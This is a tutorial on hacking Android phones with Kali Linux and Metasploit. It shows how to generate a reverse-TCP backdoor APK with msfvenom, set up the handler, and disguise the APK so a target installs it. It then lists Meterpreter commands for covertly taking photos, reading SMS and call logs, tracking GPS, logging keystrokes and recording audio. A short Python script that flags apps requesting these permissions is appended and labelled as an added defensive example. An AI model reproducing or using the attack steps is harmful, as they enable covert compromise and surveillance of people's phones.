Kali Linux uses MSF to hack Android phones
- 1. What is msf
- 2. The penetration process
- 3. Meterpreter commands for the Android phone
  - 1. Check the other party's mobile phone system information
  - 2. Check which apps are installed on the other party's phone
  - 3. Remotely control the other party's mobile phone to take a photo
  - 4. Remotely control the other party's mobile phone to start video chat
  - 5. View the SMS messages of the other party's mobile phone in real time
  - 6. Get the address book of the other party's mobile phone
  - 7. Obtain the GPS location of the other party's mobile phone in real time
  - 8. More commands
1. What is msf
msfvenom is Metasploit's standalone payload generator and a replacement for msfpayload and msfencode. It is the tool used here to generate the backdoor.
MSFvenom combines msfpayload and msfencode in a single framework instance. As of June 8, 2015, msfvenom replaces msfpayload and msfencode.
Demo environment
Kali 2021.3 is used for the demonstration
Target machine: Xiaoyao Android emulator, Android 7.1.2
Software: msfvenom, msfconsole (built into Kali)
2. The penetration process
1. Enter administrator mode
Command: sudo su
Explanation: If you do not run in administrator mode, you may be told that you have insufficient permissions. To avoid failed commands, run the following commands as administrator.
Tip: Enter Kali's password after executing the command. The password is not shown as you type; just type it and press Enter.
2. Generate executable Trojan files
Command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<local IP> LPORT=<local port> R > <file name>.apk
Example: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
Explanation: The local IP is the IP address of your own Kali host; you can use ifconfig to view it. The local port can be any port number that is not occupied. If the port number is occupied, the file will fail to be generated. The file name can be anything you like, such as "free thumbs up", which may make it easier for the target host to be hooked.
In the example, 192.168.32.1 is the IP address of the Kali host.
Next, run the command to generate the Trojan.
By default, the generated file is placed in the root directory.
Put the Android backdoor just generated onto the target machine.
3. Run the msfconsole command
Command: msfconsole
4. Configuration parameters
(1) Command: use exploit/multi/handler
(Select the module)
(2) Command: set payload android/meterpreter/reverse_tcp
(Select the payload)
(3) Command: set LHOST 192.168.32.1
(Fill in the IP address of your own host)
(4) Command: set LPORT 5555
(Fill in the port number when the file was just generated)
(5) Command: show options
(View the setting parameters)
(6) Command: exploit -z -j
(Execute in the background)
After the parameters are set, run the command from step (6) and open the program on the target machine. You can also simply enter the command
exploit
to start the attack. Either way works as long as the target machine has the backdoor software installed.
Detailed attack configuration parameter demonstration:
Now wait for the target machine to open the app
5. Open the executable file on the target machine
We can also disguise the program here, change its icon, or bundle it with some software, and when the user opens it, it will be automatically installed on the other party's computer.
6. View sessions
(1) Command: sessions
(View the hooked users)
(2) Command: sessions -i 1
(Select the user to be attacked)
When the prompt
meterpreter
appears, the intrusion has succeeded.
3. Meterpreter commands for the Android phone
1. Check the other party's mobile phone system information
Command: sysinfo
2. Check which apps are installed on the other party's phone
Command: app_list
3. Remotely control the other party's mobile phone to take a photo
Command: webcam_snap
4. Remotely control the other party's mobile phone to start video chat
Command: webcam_chat
5. View the SMS messages of the other party's mobile phone in real time
Command: dump_sms
6. Get the address book of the other party's mobile phone
Command: dump_calllog
7. Obtain the GPS location of the other party's mobile phone in real time
Command: geolocate
8. More commands
You can also view the help documentation with the command
help
cmd commands:
cat          read file contents to the screen
cd           change directory
checksum     retrieve the checksum of a file
cp           copy source to destination
del          delete the specified file
dir          list files (alias for ls)
download     download a file or directory
edit         edit a file
getlwd       print local working directory
getwd        print working directory
lcd          change local working directory
lls          list local files
lpwd         print local working directory
ls           list files
mkdir        create a directory
mv           move source to destination
pwd          print working directory
rm           delete the specified file
rmdir        delete a directory
search       search for files
show_mount   list all mount points/logical drives
upload       upload a file or directory
pkill        kill processes by name
meterpreter commands:
keyscan_start        start capturing keystrokes (start keylogging)
keyscan_dump         dump the keystroke buffer (download the keylog)
keyscan_stop         stop capturing keystrokes (stop keylogging)
record_mic           record audio from the default microphone for X seconds
webcam_chat          start a video chat (the other party will see a pop-up window)
webcam_list          list webcams (view the camera list)
webcam_snap          take a snapshot from the specified webcam
webcam_stream        play the video stream from the specified webcam (camera monitoring)
enumdesktops         list all accessible desktops and window stations
getdesktop           get the current meterpreter desktop
setdesktop           change Meterpreter's current desktop
reboot               reboot the remote computer
shutdown             shut down the remote computer
shell                drop into a system command shell
idletime             return the number of seconds the remote user has been idle
keyboard_send        send keystrokes
keyevent             send a keystroke event
mouse                send mouse events
screenshare          watch the remote user's desktop in real time
screenshot           take a screenshot of the interactive desktop
uictl                control some user interface components
play                 play a wave audio file (.wav) on the target system
getsystem            attempt to elevate your privileges to those of the local system
execute -f notepad   open Notepad
Command to upload a file to the target machine
Command to download a file to the host
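
A defender's check for the capabilities walked through in section 3, as an added example that is not part of the original page: it parses the text output of `aapt dump permissions <apk>` and flags an app that requests most of the permissions those Meterpreter commands depend on. The command-to-permission mapping, the threshold, the package names and both sample outputs are assumptions constructed for this example.

```python
import re

# Permissions behind the commands shown in section 3
# (mapping is an assumption of this example, not taken from the page).
SENSITIVE = {
    "android.permission.CAMERA": "webcam_snap / webcam_chat / webcam_stream",
    "android.permission.RECORD_AUDIO": "record_mic",
    "android.permission.READ_SMS": "dump_sms",
    "android.permission.READ_CALL_LOG": "dump_calllog",
    "android.permission.ACCESS_FINE_LOCATION": "geolocate",
}

# Accepts both aapt styles: name='android.permission.X' and bare android.permission.X
PERM_RE = re.compile(r"^uses-permission:\s*(?:name=)?'?([\w.]+)'?", re.M)
PKG_RE = re.compile(r"^package:\s*(\S+)", re.M)

def audit_permissions(aapt_output, threshold=4):
    """Return (package, sensitive permissions requested, flagged).

    flagged is True when the APK asks for at least `threshold` of the
    permissions in SENSITIVE, which is unusual for a single-purpose app."""
    pkg = PKG_RE.search(aapt_output)
    requested = set(PERM_RE.findall(aapt_output))
    hits = sorted(requested & SENSITIVE.keys())
    return (pkg.group(1) if pkg else None, hits, len(hits) >= threshold)

# Constructed sample: a sideloaded APK with a broad permission set.
SUSPECT = """package: com.example.freegift
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
"""

# Constructed sample: a flashlight app, older aapt output style.
BENIGN = """package: com.example.flashlight
uses-permission: android.permission.CAMERA
"""

if __name__ == "__main__":
    for sample in (SUSPECT, BENIGN):
        package, hits, flagged = audit_permissions(sample)
        print(package, "REVIEW" if flagged else "ok")
        for perm in hits:
            print("   ", perm, "->", SENSITIVE[perm])
```

A flag is a prompt for manual review, not a verdict: legitimate messaging or camera apps can also request several of these permissions.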